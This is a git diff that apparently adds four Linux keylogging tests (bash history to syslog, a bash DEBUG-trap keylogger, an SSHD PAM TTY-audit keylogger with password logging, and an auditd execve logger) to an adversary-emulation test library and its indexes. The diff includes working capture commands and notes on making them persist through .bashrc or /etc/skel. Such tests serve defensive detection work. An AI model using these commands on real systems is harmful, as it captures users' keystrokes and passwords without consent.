diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 48fab1bd..d4fe89f6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -32,6 +32,10 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -109,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a87b19bb..539fcfdf 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f02535b2..441c083d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -59,6 +59,10 @@
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
@@ -189,6 +193,10 @@
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d8878c2a..6d926267 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -23,6 +23,10 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -83,6 +87,10 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 93d419bd..0f807a6d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2688,6 +2688,148 @@ credential-access:
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
name: sh
elevation_required: true
+ - name: Logging bash history to syslog
+ auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+ description: "There are several variables that can be set to control the appearance
+ of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+ of these variables are executed as if they had been typed on the command line.
+ The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+ and can be configured to write the latest \"bash history\" entries to the
+ syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+ or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell and that logger
+ and tee are installed.
+
+'
+ prereq_command: |
+ if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+ if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+ echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+ tail /var/log/syslog
+ cleanup_command: 'unset PROMPT_COMMAND
+
+'
+ - name: Bash session based keylogger
+ auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+ description: "When a command is executed in bash, the BASH_COMMAND variable
+ contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+ The trap command is not a external command, but a built-in function of bash
+ and can be used in a script to run a bash function when some event occurs.
+ trap will detect when the BASH_COMMAND variable value changes and then pipe
+ that value into a file, creating a bash session based keylogger. \n\nTo gain
+ persistence the command could be added to the users .bashrc or .bash_aliases
+ or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell
+
+'
+ prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+ Bash not running! *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ name: output_file
+ description: File to store captured commands
+ type: String
+ default: "/tmp/.keyboard.log"
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+ echo "Hello World!"
+ cat #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ - name: SSHD PAM keylogger
+ auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+ description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+ The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+ of TTY input and capture all keystrokes in a ssh session and place them in
+ the /var/log/audit/audit.log file after the session closes.
+
+'
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: |
+ if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ user_account:
+ description: Basic ssh user account for testing.
+ type: string
+ default: ubuntu
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+ disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+ restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+ cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+ - name: Auditd keylogger
+ auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+ description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+ command execution and place the command in the /var/log/audit/audit.log audit
+ log. \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+ auditd NOT installed *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ description: description
+ type: type
+ default: default
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+ -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+ $(date +\"%d/%m/%y %H:%M:%S\") \n"
+ cleanup_command: 'systemctl restart auditd
+
+'
T1557.001:
technique:
external_references:
@@ -8325,6 +8467,148 @@ collection:
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
name: sh
elevation_required: true
+ - name: Logging bash history to syslog
+ auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+ description: "There are several variables that can be set to control the appearance
+ of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+ of these variables are executed as if they had been typed on the command line.
+ The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+ and can be configured to write the latest \"bash history\" entries to the
+ syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+ or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell and that logger
+ and tee are installed.
+
+'
+ prereq_command: |
+ if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+ if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+ echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+ tail /var/log/syslog
+ cleanup_command: 'unset PROMPT_COMMAND
+
+'
+ - name: Bash session based keylogger
+ auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+ description: "When a command is executed in bash, the BASH_COMMAND variable
+ contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+ The trap command is not a external command, but a built-in function of bash
+ and can be used in a script to run a bash function when some event occurs.
+ trap will detect when the BASH_COMMAND variable value changes and then pipe
+ that value into a file, creating a bash session based keylogger. \n\nTo gain
+ persistence the command could be added to the users .bashrc or .bash_aliases
+ or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell
+
+'
+ prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+ Bash not running! *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ name: output_file
+ description: File to store captured commands
+ type: String
+ default: "/tmp/.keyboard.log"
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+ echo "Hello World!"
+ cat #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ - name: SSHD PAM keylogger
+ auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+ description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+ The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+ of TTY input and capture all keystrokes in a ssh session and place them in
+ the /var/log/audit/audit.log file after the session closes.
+
+'
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: |
+ if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ user_account:
+ description: Basic ssh user account for testing.
+ type: string
+ default: ubuntu
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+ disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+ restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+ cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+ - name: Auditd keylogger
+ auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+ description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+ command execution and place the command in the /var/log/audit/audit.log audit
+ log. \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+ auditd NOT installed *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ description: description
+ type: type
+ default: default
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+ -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+ $(date +\"%d/%m/%y %H:%M:%S\") \n"
+ cleanup_command: 'systemctl restart auditd
+
+'
T1557.001:
technique:
external_references:
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index 88c11054..72a6bc3e 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways
- [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd)
+- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog)
+
+- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger)
+
+- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger)
+
+- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger)
+
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te
+
+
+
+## Atomic Test #3 - Logging bash history to syslog
+There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+tail /var/log/syslog
+```
+
+#### Cleanup Commands:
+```sh
+unset PROMPT_COMMAND
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires to be run in a bash shell and that logger and tee are installed.
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Bash session based keylogger
+When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to store captured commands | String | /tmp/.keyboard.log|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+echo "Hello World!"
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+rm #{output_file}
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires to be run in a bash shell
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - SSHD PAM keylogger
+Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_account | Basic ssh user account for testing. | string | ubuntu|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+cp -v /etc/pam.d/sshd /tmp/
+echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+systemctl restart sshd
+systemctl restart auditd
+ssh #{user_account}@localhost
+whoami
+sudo su
+whoami
+exit
+exit
+```
+
+#### Cleanup Commands:
+```cmd
+cp -fv /tmp/sshd /etc/pam.d/
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Auditd keylogger
+The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | description | type | default|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+auditctl -a always,exit -F arch=b64 -S execve -k CMDS
+auditctl -a always,exit -F arch=b32 -S execve -k CMDS
+whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
+```
+
+#### Cleanup Commands:
+```cmd
+systemctl restart auditd
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+